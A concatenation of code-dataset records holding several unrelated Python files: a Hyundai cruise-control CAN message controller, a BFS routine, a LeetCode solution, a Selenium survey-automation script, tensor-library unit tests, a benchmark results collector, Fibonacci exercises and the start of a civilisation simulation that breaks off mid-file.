CS.out.cruiseState.modeSel == 3)\n if not run_speed_ctrl:\n if CS.out.cruiseState.modeSel == 0:\n self.steer_mode = \"오파모드\"\n elif CS.out.cruiseState.modeSel == 1:\n self.steer_mode = \"차간+커브\"\n elif CS.out.cruiseState.modeSel == 2:\n self.steer_mode = \"차간ONLY\"\n elif CS.out.cruiseState.modeSel == 3:\n self.steer_mode = \"자동RES\"\n elif CS.out.cruiseState.modeSel == 4:\n self.steer_mode = \"순정모드\"\n if CS.out.steerWarning == 0:\n self.mdps_status = \"정상\"\n elif CS.out.steerWarning == 1:\n self.mdps_status = \"오류\"\n if CS.lkas_button_on == 0:\n self.lkas_switch = \"OFF\"\n elif CS.lkas_button_on == 1:\n self.lkas_switch = \"ON\"\n else:\n self.lkas_switch = \"-\"\n \n if CS.out.cruiseState.modeSel == 3:\n str_log2 = '주행모드={:s} MDPS상태={:s} LKAS버튼={:s} AUTORES=(VS:{:03.0f}/CN:{:01.0f}/RD:{:03.0f}/BK:{})'.format( self.steer_mode, self.mdps_status, self.lkas_switch, CS.VSetDis, self.res_cnt, self.res_delay, CS.out.brakeLights )\n else:\n str_log2 = '주행모드={:s} MDPS상태={:s} LKAS버튼={:s}'.format( self.steer_mode, self.mdps_status, self.lkas_switch )\n trace1.printf2( '{}'.format( str_log2 ) )\n\n #print( 'st={} cmd={} long={} steer={} req={}'.format(CS.out.cruiseState.standstill, pcm_cancel_cmd, self.CP.openpilotLongitudinalControl, apply_steer, steer_req ) )\n\n\n if pcm_cancel_cmd and self.CP.openpilotLongitudinalControl:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.CANCEL, clu11_speed))\n elif CS.out.cruiseState.standstill and not self.car_fingerprint == CAR.NIRO_EV:\n # run only first time when the car stopped\n if self.last_lead_distance == 0 or not self.param_OpkrAutoResume:\n # get the lead distance from the Radar\n self.last_lead_distance = CS.lead_distance\n self.resume_cnt = 0\n # when lead car starts moving, create 6 RES msgs\n elif CS.lead_distance != self.last_lead_distance and (frame - self.last_resume_frame) > 5:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.resume_cnt += 1\n # 
interval after 6 msgs\n if self.resume_cnt > 5:\n self.last_resume_frame = frame\n self.resume_cnt = 0\n elif CS.out.cruiseState.standstill and self.car_fingerprint == CAR.NIRO_EV:\n if CS.lead_distance > 3.7 and (frame - self.last_resume_frame)*DT_CTRL > 0.2 and self.param_OpkrAutoResume:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.last_resume_frame = frame\n\n # reset lead distnce after the car starts moving\n elif self.last_lead_distance != 0:\n self.last_lead_distance = 0\n elif run_speed_ctrl and self.SC != None:\n is_sc_run = self.SC.update( CS, sm, self )\n if is_sc_run:\n can_sends.append(create_clu11(self.packer, self.resume_cnt, CS.scc_bus, CS.clu11, self.SC.btn_type, self.SC.sc_clu_speed ))\n self.resume_cnt += 1\n else:\n self.resume_cnt = 0\n \n if CS.out.cruiseState.modeSel == 3:\n if CS.out.brakeLights and CS.VSetDis > 30:\n self.res_cnt = 0\n self.res_delay = 50\n elif self.res_delay:\n self.res_delay -= 1\n elif not self.res_delay and self.res_cnt < 6 and CS.VSetDis > 30 and CS.out.vEgo > 30 * CV.KPH_TO_MS:\n if self.res_cnt < 1:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.CANCEL, clu11_speed))\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.res_cnt += 1\n else:\n self.res_cnt = 7\n self.res_delay = 0\n\n # 20 Hz LFA MFA message\n if frame % 5 == 0 and self.car_fingerprint in FEATURES[\"send_lfa_mfa\"]:\n can_sends.append(create_lfa_mfa(self.packer, frame, enabled))\n\n self.lkas11_cnt += 1\n return can_sends\n","sub_path":"selfdrive/car/hyundai/carcontroller.py","file_name":"carcontroller.py","file_ext":"py","file_size_in_byte":14760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140494873","text":"from queue import Queue\r\n\r\n\r\ndef bfs(G, s):\r\n n = len(G)\r\n visited = [False] * n\r\n d = [-1] * n\r\n parent = [None] * n\r\n Q = Queue()\r\n d[s] = 0\r\n visited[s] = True\r\n Q.put(s)\r\n\r\n while not Q.empty():\r\n u = Q.get()\r\n for v in G[u]:\r\n if not visited[v]:\r\n visited[v] = True\r\n d[v] = d[u] + 1\r\n parent[v] = u\r\n Q.put(v)\r\n\r\n return visited, d, parent\r\n\r\n\r\nG = [[1, 2], [0, 4], [0, 3, 5], [2, 4], [1, 3, 5], [2, 4, 6], [5, 7], [6]]\r\nstart = 0\r\nvisited, d, parent = bfs(G, start)\r\nprint(visited, d, parent, sep=\"\\n\")","sub_path":"Ćwiczenia 8/bfs_alist.py","file_name":"bfs_alist.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184143392","text":"'''\nAuthor: Puffrora\nDate: 2022-04-28 17:42:46\nLastModifiedBy: Puffrora\nLastEditTime: 2022-04-29 03:07:43\n'''\n\n\nfrom typing import List\n\nclass Solution:\n def ways(self, pizza: List[str], k: int) -> int:\n \n from functools import lru_cache\n \n R, C = len(pizza), len(pizza[0])\n total = [[0 for _ in range(C+1)] for _ in range(R+1)]\n for i in range(R):\n for j in range(C):\n total[i][j] = int(pizza[i][j]==\"A\")\n for i in range(R-1, -1, -1):\n for j in range(C-1, -1, -1):\n total[i][j] += total[i+1][j]+total[i][j+1]-total[i+1][j+1]\n\n # for the rectangle left-upper point is (i, j), if we want to split it into t parts\n # there are dfs(i, j, t) possible plans in total \n @lru_cache(None)\n def dfs(i, j, t):\n nonlocal R, C\n if total[i][j] < t:\n return 0\n if t == 1:\n return 1\n tmp = 0\n for i1 in range(i+1, R):\n # make sure at least one apple is 
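A natural companion to bfs_alist.py above: the parent array it returns encodes a shortest-path tree, so a path can be read off by walking parents back from the target. A small helper (not part of the original file):

def shortest_path(parent, target):
    # walk the BFS parent pointers back to the source, then reverse
    path = []
    while target is not None:
        path.append(target)
        target = parent[target]
    return path[::-1]

# with the graph G and start = 0 from the file: shortest_path(parent, 7) -> [0, 2, 5, 6, 7]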
distributed\n if total[i1][j] < total[i][j]:\n if total[i1][j] < t-1:\n break\n tmp += dfs(i1, j, t-1)\n for j1 in range(j+1, C):\n # make sure at least one apple is distributed\n if total[i][j1] < total[i][j]:\n if total[i][j1] < t-1:\n break\n tmp += dfs(i, j1, t-1)\n return tmp % (10**9 + 7)\n \n return dfs(0, 0, k)\n\n# print(Solution().ways([\"A.AA.A\",\"A..AAA\",\"AA.AA.\",\"..AAA.\"], 5))","sub_path":"Leetcode/leetcode1444 切披萨的方案数.py","file_name":"leetcode1444 切披萨的方案数.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"512904315","text":"import os\r\nimport unittest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom features.config.config import settings\r\n\r\n\"\"\"\r\n Author: Muhammad Umair\r\n Date: 12/6/2019\r\n Description:\r\n This file contains all logic implementation of the automation structure\r\n\"\"\"\r\n\r\nclass YunoSurveysUI():\r\n\r\n def __init__(self):\r\n \"\"\"\r\n | This is the constructor of the class\r\n | This will launch the webdriver as set in the settings.json file & maximize the browser window to prepare for the UI automation test.\r\n \"\"\"\r\n if settings['browser'].lower()== \"chrome\":\r\n self.driver = webdriver.Chrome(\"webdrivers/chromedriver\")\r\n elif settings['browser'].lower()== \"ie\":\r\n self.driver = webdriver.Chrome(\"webdrivers/IEDriverServer\")\r\n elif settings['browser'].lower()== \"firefox\":\r\n self.driver = webdriver.Chrome(\"webdrivers/geckodriver\")\r\n self.driver.maximize_window()\r\n\r\n def go_to_survey(self, survey_link):\r\n \"\"\"\r\n Description:\r\n | Method to redirect to the given survey link\r\n :param: survey_link\r\n :type: string\r\n \"\"\"\r\n try:\r\n self.driver.get(str(survey_link))\r\n self.driver.implicitly_wait(30)\r\n \"\"\"\r\n element = WebDriverWait(self.driver, 30).until(EC.presence_of_element_located(By.XPATH(\"//div[@notify-message='question.notify_message']\")))\r\n \"\"\"\r\n except Exception as error:\r\n print('Error loading survey: ' + repr(error))\r\n\r\n def undertaking(self):\r\n \"\"\"\r\n Description:\r\n | Method to verify undertaking before taking survey\r\n \"\"\"\r\n try:\r\n undertaking = self.driver.find_element_by_xpath(\"//label[@for='answer_1_O0010']\")\r\n undertaking.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def click_next_button(self):\r\n \"\"\"\r\n Description:\r\n | Method to click on the \"NEXT\" button present on every page of the survey\r\n \"\"\"\r\n try:\r\n next_btn = self.driver.find_element_by_xpath(\"//button[contains(text(), 'Next')]\")\r\n next_btn.click()\r\n except Exception as error:\r\n print('Error clicking next button: ' + repr(error))\r\n\r\n def select_option(self, option):\r\n \"\"\"\r\n Description:\r\n | Method to select option to answer a survey question\r\n :param: option\r\n :type: string\r\n \"\"\"\r\n select_ans = self.driver.find_elements_by_xpath(\"//label[contains(text(), '\"+str(option)+\"')]\")\r\n select_ans[0].click()\r\n self.click_next_button()\r\n\r\n def write_answer(self, value):\r\n \"\"\"\r\n Description:\r\n | Method to write answer to a survey question\r\n :param: value\r\n :type: string\r\n \"\"\"\r\n self.driver.find_element_by_xpath(\"//input[@name='input']\").send_keys(value)\r\n 
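The total array in the leetcode1444 solution above is a 2-D suffix sum: total[i][j] counts the apples in the rectangle from (i, j) to the bottom-right corner, built with the inclusion-exclusion recurrence total[i][j] = A(i, j) + total[i+1][j] + total[i][j+1] - total[i+1][j+1]. A minimal standalone sketch:

pizza = ["A..", ".A.", "..A"]
R, C = len(pizza), len(pizza[0])
total = [[0] * (C + 1) for _ in range(R + 1)]   # sentinel row/column of zeros
for i in range(R - 1, -1, -1):
    for j in range(C - 1, -1, -1):
        total[i][j] = (int(pizza[i][j] == "A")
                       + total[i + 1][j] + total[i][j + 1] - total[i + 1][j + 1])
# total[0][0] == 3 (apples in the whole pizza); total[1][1] == 2 (lower-right 2x2 block)

This is what lets the memoized dfs decide in O(1) whether a remaining piece still holds at least one apple.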
self.click_next_button()\r\n\r\n def answer_news_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"How many hours per day do you spend on reading the news?\"\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n self.read_survey_question()\r\n news_hrs = self.driver.find_element_by_xpath(\"//label[@for='answer_2_O0010']\")\r\n print(str(news_hrs.get_attribute(\"innerText\")))\r\n news_hrs.click()\r\n\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def social_media_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Which of these social media platforms do you use at least once a week?\"\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n last_option = self.driver.find_elements_by_xpath(\"//label[@for='answer_3_O0070']\")\r\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n except Exception as error:\r\n print('Error scrolling on page: ' + repr(error))\r\n\r\n try:\r\n insta = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Instagram')]\")\r\n print(str(insta.get_attribute(\"innerText\")))\r\n insta.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n\r\n try:\r\n fb = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Facebook')]\")\r\n print(str(fb.get_attribute(\"innerText\")))\r\n fb.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n\r\n try:\r\n lkdn = self.driver.find_elements_by_xpath(\"//label[contains(text(), 'LinkedIn')]\")\r\n print(str(lkdn[0].get_attribute(\"innerText\")))\r\n lkdn[0].click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def media_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Which of the following media do you use at least once a week?\"\r\n \"\"\"\r\n try:\r\n tv = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Television')]\")\r\n print(str(tv.get_attribute(\"innerText\")))\r\n tv.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def secrets_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"If given the chance to learn all the secrets of one PROMINENT PERSON, whose secrets would you like to know?\"\r\n \"\"\"\r\n try:\r\n secrets = self.driver.find_element_by_xpath(\"//input[@name='input']\")\r\n secrets.send_keys(\"none\")\r\n print(\"none\")\r\n except Exception as error:\r\n print('Error writing answer: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def trust_media_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Do you agree or disagree: In general, I trust the information I get from the media.\"\r\n \"\"\"\r\n try:\r\n trust_info = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Somewhat agree')]\")\r\n print(str(trust_info.get_attribute(\"innerText\")))\r\n trust_info.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def math_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"What is five plus two?\"\r\n \"\"\"\r\n try:\r\n math_input = 
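Many of the click handlers in yuno_surveys_ui_logic.py repeat the same find/click/try-except pattern; one way to factor it out is a wait-and-click helper built on WebDriverWait, in the spirit of the commented-out wait in go_to_survey. This is a hypothetical helper, not part of the original file:

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def safe_click(driver, xpath, timeout=10):
    """Wait until the element is clickable, click it, and report failures."""
    try:
        element = WebDriverWait(driver, timeout).until(
            EC.element_to_be_clickable((By.XPATH, xpath)))
        element.click()
        return True
    except Exception as error:
        print('Error clicking option: ' + repr(error))
        return False

Each question method could then reduce to safe_click(self.driver, "//label[contains(text(), 'City')]") plus its logging.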
self.driver.find_element_by_xpath(\"//input[@name='input']\")\r\n math_input.send_keys(\"7\")\r\n print(\"7\")\r\n except Exception as error:\r\n print('Error writing answer: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def city_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Do you live in a city or in a rural area?\"\r\n \"\"\"\r\n try:\r\n city = self.driver.find_element_by_xpath(\"//label[contains(text(), 'City')]\")\r\n print(str(city.get_attribute(\"innerText\")))\r\n city.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def film_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Which is your favourite from these award-winning films?\"\r\n \"\"\"\r\n try:\r\n film = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Forrest Gump')]\")\r\n print(str(film.get_attribute(\"innerText\")))\r\n film.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def gandhi_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"What do you like most about Gandhi?\"\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n except Exception as error:\r\n print('Error scrolling on page: ' + repr(error))\r\n\r\n try:\r\n gandhi_film = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Sound')]\")\r\n print(str(gandhi_film.get_attribute(\"innerText\")))\r\n gandhi_film.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def verify_survey_ended(self):\r\n \"\"\"\r\n Description:\r\n | Method to verify that the survey has ended\r\n :return: string\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n end_text = self.driver.find_elements_by_xpath(\"//*[contains(text(), 'All done!')]\")\r\n print(str(end_text[0].get_attribute(\"innerText\")))\r\n except Exception as error:\r\n print('Error finding final text: ' + repr(error))\r\n return str(end_text[0].get_attribute(\"innerText\"))\r\n\r\n def get_answer(self, question):\r\n \"\"\"\r\n Description:\r\n | This method will select a pre-defined answer for each of the given questions in the survey\r\n :param: question\r\n :type: string\r\n \"\"\"\r\n if \"reading\" in question:\r\n self.answer_news_question()\r\n elif \"trust\" in question:\r\n self.trust_media_question()\r\n elif \"social\" in question:\r\n self.social_media_question()\r\n elif \"media\" in question:\r\n self.media_question()\r\n elif \"secrets\" in question:\r\n self.secrets_question()\r\n elif \"five\" in question:\r\n self.math_question()\r\n elif \"city\" in question:\r\n self.city_question()\r\n elif \"award-winning\" in question:\r\n self.film_question()\r\n elif \"like\" in question:\r\n self.gandhi_question()","sub_path":"features/business_logic/yuno_surveys_ui_logic.py","file_name":"yuno_surveys_ui_logic.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453747244","text":"import unittest\nimport sys\nsys.path.append('../')\nfrom tanuki import *\nfrom tanuki.onedim import *\nimport numpy as np\nfrom math import sqrt\nimport copy\n\nclass TestProduct(unittest.TestCase):\n def 
test_inner(self):\n A = random_opn1DTPS([[\"p0\"],[\"p1\"],[\"p2\"]])\n B = random_opn1DTPS([[\"q0\"],[\"q1\"],[\"q2\"]])\n a = A.to_tensor()\n b = B.to_tensor()\n C = inner_product_fin1DSimTPS_fin1DSimTPS(A,B)\n c = a.conj()[[\"p0\",\"p1\",\"p2\"]] * b[\"q0\",\"q1\",\"q2\"]\n self.assertEqual(C,c)\n\n def test_abs_sub(self):\n phys_labelss = [[\"p0\"],[\"p1\"],[\"p2\"]]\n A = random_opn1DTPS(phys_labelss)\n B = random_opn1DTPS(phys_labelss)\n C = abs_sub_fin1DSimTPS_fin1DSimTPS(A,B)\n a = A.to_tensor()\n b = B.to_tensor()\n c = (a - b).norm()\n self.assertAlmostEqual(C,c)\n\n\n\n\n\n\nif __name__==\"__main__\":\n unittest.main()","sub_path":"utests/test_onedim_product.py","file_name":"test_onedim_product.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"588891517","text":"#!/usr/bin/env python3\n\n\nimport argparse\nimport pandas as pd\nimport pathlib\nimport os\n\n\ndef dir_path(string):\n if os.path.isdir(string):\n return string\n else:\n raise NotADirectoryError(string)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"src_path\", type=dir_path)\n parser.add_argument(\"out_file\")\n parser.add_argument(\"--raw\", dest=\"raw\", action=\"store_true\")\n args = parser.parse_args()\n\n # collect data from all runs\n data_frames = []\n for path in pathlib.Path(args.src_path).rglob(\"results.csv\"):\n data_frames.append(pd.read_csv(path.as_posix()))\n\n # determine min, max and median\n if not args.raw:\n reduced_data_frames = []\n for df in data_frames:\n reduced_df = df.drop(columns=[\"time_ms\", \"iteration\"]).drop_duplicates()\n reduced_df[\"min_time_ms\"] = df[\"time_ms\"].min()\n reduced_df[\"max_time_ms\"] = df[\"time_ms\"].max()\n reduced_df[\"median_time_ms\"] = df[\"time_ms\"].median()\n reduced_df[\"mean_time_ms\"] = df[\"time_ms\"].mean()\n reduced_data_frames.append(reduced_df)\n data_frames = reduced_data_frames\n\n # concatenate the data\n concat = pd.concat(data_frames, ignore_index=True)\n\n # write the concatenated results\n concat.to_csv(args.out_file)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchmark/runner/collect_results.py","file_name":"collect_results.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"341124926","text":"# Recursive Solution\ndef fib_rec(n):\n\tif n == 0 or n == 1:\n\t\treturn n\n\telse:\n\t\treturn fib_rec(n-1) + fib_rec(n-2)\n\n\n# Instantiate Cache information for Dynamic Programming Solution\nn = 10\ncache = [None] * (n + 1)\ndef fib_dyn(n):\n\tif n == 0 or n == 1:\n\t\treturn n\n\tif cache[n] != None:\n\t\treturn cache[n]\n\tcache[n] = fib_dyn(n-1) + fib_dyn(n-2)\n\treturn cache[n]\n\n\n# Iterative Solution\ndef fib_iter(n):\n\ta, b = 0, 1 \n\twhile n > 0:\n\t\ta, b = b, a+b\n\t\tn -= 1\n\treturn a\n\n\n\"\"\"\nUNCOMMENT THE CODE AT THE BOTTOM OF THIS CELL TO SELECT WHICH SOLUTIONS TO TEST.\nTHEN RUN THE CELL.\n\"\"\"\n\nfrom nose.tools import assert_equal\n\nclass TestFib(object):\n \n def test(self,solution):\n assert_equal(solution(10),55)\n assert_equal(solution(1),1)\n assert_equal(solution(23),28657)\n print('Passed all tests.')\n# UNCOMMENT FOR CORRESPONDING FUNCTION\nt = TestFib()\n\n#t.test(fib_rec)\nt.test(fib_dyn) # Note, will need to reset cache size for each test!\n#t.test(fib_iter)","sub_path":"Udemy Python Algorithms 
Course/Recursion/Fibonacci_Sequence.py","file_name":"Fibonacci_Sequence.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"125455061","text":"###############################################################################\n# ಠ_ಠ CIV ಠ_ಠ #\n###############################################################################\n\n#import matplotlib.pyplot as plt\nimport numpy as np\nfrom random import *\nfrom tkinter import *\nimport math\nfrom PIL import Image, ImageTk\nimport tkinter.messagebox\n#import time\n\n\n# on a map, unit digit gives you the type of field and the other remaining\n# digits give you the civilisation that control the land(if there's no other\n# digit then the field is free).\n\n# legend of the map:\nlegend = {4: \"dry\", 2: \"basic\", 1: \"fertil\", 6: \"desert\", 5: \"mountains\", 3: \"mine\"}\n# gives the initial population on a field based on his type:\ndic_population = {1: 12000, 2: 10000, 3: 4000, 4: 6000, 5: 2000, 6: 1000}\n\ndic_ressources = {1: (dic_population[1] * 1.2 / 2000, 0), 2: (dic_population[2] * 1 / 2000, 0), 3: (0, 4),\n 4: (dic_population[4]*0.6/ 2000, 0), 5: (0, 2), 6: (0, 0)}\n\ngturn=1\ngnot_slowed_down=True\n# 1 food = 2000 persons\n#\n\n\n\n###############################################################################\n# ಠ_ಠ IMPORTANT VARIABLES ಠ_ಠ #\n###############################################################################\n\nprint(\"enter the standard productivity\")\nproductivity = float(input()) # between 0 and 1\nprint(\"enter the standard agressivity\")\nagressivity = float(input()) # between 0 and 1\n\nexpansion = 1 # expansion rate\n\nciv_counter = 0 # counts civ\ndic_civ = dict() # civ dict containing all civs things\n\n\n###############################################################################\n# ಠ_ಠ THE MAP ಠ_ಠ #\n###############################################################################\ndef create_map_random():\n '''\n Generates a random map with a certain percentage of each type of biome.\n Returns the generated map.\n '''\n m = np.random.randint(0, 1, (45, 45))\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n rand = random()\n if rand <= 0.1:\n m[i][j] = 6 # generate a desert\n elif rand <= 0.22:\n m[i][j] = 5 # generate a mountain\n elif rand <= 0.33:\n m[i][j] = 3 # generate a mine\n elif rand <= 0.58:\n m[i][j] = 4 # generate an arid field\n elif rand <= 0.85:\n m[i][j] = 2 # generate a basic field\n elif rand <= 1:\n m[i][j] = 1 # generate a fertil field\n return m\n\ndef create_map_basic():\n m = np.random.randint(0, 1, (45, 45))\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n m[i][j]=2\n return m\n\ndef homogeneize(m):\n '''\n Homogeneizes a given map with a certain percentage of each type of biome.(takes every field that is surrounded by the same type of field and makes it match the others).\n Returns the new map.\n '''\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n if i + 1 < len(m) and j + 1 < len(m) and m[i + 1][j] == m[i][j + 1] == m[i - 1][j]:\n m[i][j] = m[i + 1][j]\n elif i + 1 < len(m) and j + 1 < len(m) and m[i][j + 1] == m[i - 1][j] == m[i][j - 1]:\n m[i][j] = m[i][j + 1]\n elif i + 1 < len(m) and j + 1 < len(m) and m[i + 1][j] == m[i - 1][j] == m[i][j - 1]:\n m[i][j] = m[i + 1][j]\n elif i + 1 < len(m) and j + 1 < len(m) and m[i + 1][j] == m[i][j + 1] == m[i][j - 1]:\n m[i][j] = m[i + 1][j]\n\n print(m)\n return m\n\n\ndef test_map_generation(m):\n '''\n Prints 
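On Fibonacci_Sequence.py, the record above: its dynamic-programming variant relies on a module-level cache sized to a fixed n, which is why the test comment warns that the cache must be reset per test. A sketch of the same memoization with functools.lru_cache, which needs no manual sizing (an alternative, not the original code):

from functools import lru_cache

@lru_cache(maxsize=None)
def fib_memo(n):
    if n < 2:
        return n
    return fib_memo(n - 1) + fib_memo(n - 2)

assert fib_memo(10) == 55 and fib_memo(23) == 28657   # the values the test suite checks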
the presence's percentage of every biome in a given map.\n '''\n count = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n if m[i][j] == 1:\n count[1] += 1\n elif m[i][j] == 2:\n count[2] += 1\n\n elif m[i][j] == 3:\n count[3] += 1\n\n elif m[i][j] == 4:\n count[4] += 1\n\n elif m[i][j] == 5:\n count[5] += 1\n\n elif m[i][j] == 6:\n count[6] += 1\n print(\"fertile:\")\n print(int(100 * (count[1] / (len(m) * len(m)))))\n print(\"basic\")\n print(int(100 * (count[2] / (len(m) * len(m)))))\n print(\"mine\")\n print(int(100 * (count[3] / (len(m) * len(m)))))\n print(\"aride\")\n print(int(100 * (count[4] / (len(m) * len(m)))))\n print(\"mountains\")\n print(int(100 * (count[5] / (len(m) * len(m)))))\n print(\"desert\")\n print(int(100 * (count[6] / (len(m) * len(m)))))\n\n\n###############################################################################\n# ಠ_ಠ THE CIVILISATIONS ಠ_ಠ #\n###############################################################################\n\ndef create_civ(t):\n '''\n given a type of civilisation : expert,warrior or moderate\n Returns a civilisation in the form of a dictionnary giving each of her caracteristics :\n {civname,agressivity,productivity,expansion rate,civ_number,expand_next_iteration,power,population,food,iron,modulo}\n Returns nothing.\n '''\n global civ_counter\n if t == \"expert\":\n new_productivity = 3*productivity\n new_agressivity = agressivity\n expansion_rate = expansion\n power = 1000\n civ_counter += 1\n expand_next_iteration = 0\n food = 3\n iron = 0\n population = 0\n civ = {\"type\": t, \"aggressivity\": new_agressivity, \"productivity\": new_productivity,\n \"expansion rate\": expansion_rate, \"civ_number\": civ_counter, \"next_expand\": expand_next_iteration,\n \"power\": power, \"population\": population, \"food\": food, \"iron\": iron, \"modulo\": 3,\n \"food_per_turn\": 0, \"iron_per_turn\": 0, \"territories\": 0,\"already_earned\":0,\"already_gave\":0,\"reaction\":0}\n dic_civ[civ_counter] = civ\n\n\n elif t == \"warrior\":\n new_productivity = productivity\n new_agressivity = 10 * agressivity\n expansion_rate = 3 * expansion\n power = 1500\n civ_counter += 1\n expand_next_iteration = 0\n food = 1\n iron = 0\n population = 0\n civ = {\"type\": t, \"aggressivity\": new_agressivity, \"productivity\": new_productivity,\n \"expansion rate\": expansion_rate, \"civ_number\": civ_counter, \"next_expand\": expand_next_iteration,\n \"power\": power, \"population\": population, \"food\": food, \"iron\": iron, \"modulo\": 1,\n \"food_per_turn\": 0, \"iron_per_turn\": 0, \"territories\": 0,\"already_earned\":0,\"already_gave\":0,\"reaction\":0}\n dic_civ[civ_counter] = civ\n\n\n elif t == \"moderate\":\n new_productivity = 2 * productivity\n new_agressivity = 3 * agressivity\n expansion_rate = 2 * expansion\n power = 1250\n civ_counter += 1\n expand_next_iteration = 0\n food = 2\n iron = 0\n population = 0\n civ = {\"type\": t, \"aggressivity\": new_agressivity, \"productivity\": new_productivity,\n \"expansion rate\": expansion_rate, \"civ_number\": civ_counter, \"next_expand\": expand_next_iteration,\n \"power\": power, \"population\": population, \"food\": food, \"iron\": iron, \"modulo\": 2,\n \"food_per_turn\": 0, \"iron_per_turn\": 0, \"territories\": 0,\"already_earned\":0,\"already_gave\":0,\"reaction\":0}\n dic_civ[civ_counter] = civ\n\n\ndef spread_population(m, x, y):\n '''\n Adds the population of a field (caracterized by its coordinate (x,y)) to the total population of a civilizations on 
a given map.\n Returns nothing.\n '''\n global dic_civ\n if m[x][y] > 10:\n # math.floor(m[x][y]/10) extract the civ number from the field,\n # it's the key to enter the caracteristics of the current civilisation so we can extract here total population and add the current population of the field to it.\n dic_civ[math.floor(m[x][y] / 10)][\"population\"] += dic_population[m[x][y] % 10]\n\n\n\ndef spawn_civ(civ, m, x, y):\n '''\n Spawns a given civilisation on the map m on the (x,y) position. Returns the new map.\n Returns the new map.\n '''\n civ_num = civ[\"civ_number\"]\n food, iron = dic_ressources[m[x][y]]\n m[x][y] += civ[\"civ_number\"] * 10 # adds a second digit containing civ number\n spread_population(m,x,y) #initialize the population of the new civ\n dic_civ[civ_num][\"food\"] += food*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"iron\"] += iron*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"food_per_turn\"] += food*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"iron_per_turn\"] += iron*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"territories\"] += 1\n return m\n\n\n\n\n###############################################################################\n# ಠ_ಠ THE DYNAMICS ಠ_ಠ #\n###############################################################################\n\ndef dynamics_civ(civ, m):\n \"\"\"moves a civ on a given map m, depending on many factors :\n if the civ is 